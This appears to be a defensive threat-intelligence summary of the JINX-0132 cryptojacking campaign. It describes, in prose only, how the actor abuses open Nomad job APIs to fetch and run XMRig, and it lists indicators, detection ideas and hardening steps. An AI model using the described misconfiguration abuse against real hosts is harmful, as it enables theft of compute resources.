Full Report
The Wiz Threat Research team has identified a widespread cryptojacking campaign targeting commonly used DevOps applications including Nomad and Consul.
Analysis Summary
# Tool/Technique: XMRig Miner Deployment (JINX-0132 Campaign)
## Overview
This summary covers the tactics, techniques, and procedures (TTPs) employed by the threat actor JINX-0132, which is conducting a widespread cryptojacking campaign. The primary method involves exploiting existing misconfigurations in publicly accessible DevOps applications—specifically Nomad, Consul, Docker, and Gitea—to deploy the legitimate XMRig mining software for Monero. This campaign is notable for being the first publicly documented exploitation of Nomad misconfigurations as an attack vector.
## Technical Details
- Type: Malware (Legitimate tool used maliciously) / Technique (Misconfiguration Abuse)
- Platform: Linux/UNIX-like environments hosting exposed DevOps services (Nomad, Consul, Docker, Gitea).
- Capabilities: Executes Monero mining, leverages readily available open-source tools (Living Off The Open Source).
- First Seen: Not explicitly stated, but recently documented by Wiz Threat Research.
## MITRE ATT&CK Mapping
The primary focus is execution via service abuse and defense evasion by using legitimate tools.
- **TA0002 - Execution**
- **T1218 - Signed Binary Proxy Execution** (While XMRig isn't strictly 'signed binary,' using official releases of legitimate software falls under living-off-the-source tactics that complicate traditional detection.)
- **TA0005 - Defense Evasion**
- **T1036 - Masquerading**
- **T1036.005 - Match Legitimate Name or Location** (Using official XMRig releases)
*(Note: Mapping is based on inferred actions from the description. Direct RCE via Nomad Job creation would map strongly to T1190 or T1059.)*
## Functionality
### Core Capabilities
- **Initial Access/Execution:** Exploiting default, insecure configurations in HashiCorp Nomad to allow any API user to create and run new jobs, resulting in effective Remote Code Execution (RCE) on compromised hosts and connected nodes.
- **Payload Acquisition:** Downloading the most recent, official version of the XMRig miner directly from its public GitHub repository.
- **Persistence/Execution:** Unpacking the miner, granting execution permissions, and running the binary.
### Advanced Features
- **Living Off Open Source:** Deliberate avoidance of unique, custom C2 infrastructure or custom malware, relying solely on public tools (XMRig) and public repositories for payload acquisition, making clustering difficult.
- **Resource Hijacking:** Targeting high-compute instances (some providing tens of thousands of dollars' worth of CPU/RAM resources monthly) for maximized cryptocurrency theft.
- **Task Definition:** Using a consistent Nomad task group name (`NIGNOG`) within the deployed malicious jobs.
## Indicators of Compromise
The threat actor actively avoided hard IOCs, making detection challenging.
- File Hashes: `ea7c97294f415dc8713ac8c280b3123da62f6e56` (Hash of the XMRig binary release, not cryptographically unique to the actor).
- File Names: Not explicitly listed, but unpacked XMRig binary.
- Registry Keys: N/A (Likely Linux-based environments).
- Network Indicators:
- Monero Pool: `pool[.]supportxmr[.]com`
- Wallet Address: `468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E`
- Behavioral Indicators:
- Creation of new Nomad jobs with the task group name `NIGNOG`.
## Associated Threat Actors
- JINX-0132
## Detection Methods
- Signature-based detection: Limited, as official XMRig releases are used. File hash monitoring is brittle.
- Behavioral detection: Monitoring for the creation of new, unexpected Nomad jobs, especially if they contain task definitions downloading binaries from external sources and attempting configuration changes (e.g., executing `chmod +x`). Detection leveraging workload sensors for crypto-miner processes is effective.
- YARA rules: Not explicitly mentioned, but rules targeting XMRig command-line arguments related to the specific wallet would be effective.
## Mitigation Strategies
- **Prevention:** Immediately audit and secure all exposed DevOps tooling APIs (Nomad, Consul, Docker API, Gitea).
- **Hardening Recommendations:**
- For **Nomad**: Enforce security configurations as recommended by HashiCorp documentation to prevent the submission of arbitrary jobs by unauthorized users. This includes enabling ACLs and securing the server API.
- For all exposed services: Ensure public exposure is strictly limited, preferably utilizing VPNs or private networks for management interfaces.
- **General Posture:** Apply principle of least privilege to all users accessing configuration APIs.
## Related Tools/Techniques
- SeleniumGreed (Previous cryptomining campaign targeting exposed SeleniumGrid deployments).
- Other cryptojacking malware families that rely on hijacking compute resources (e.g., Kinsing, 8220).
- Exploitation of default configurations in other orchestration layers (e.g., exposed Kubernetes dashboards or unsecured cloud metadata services).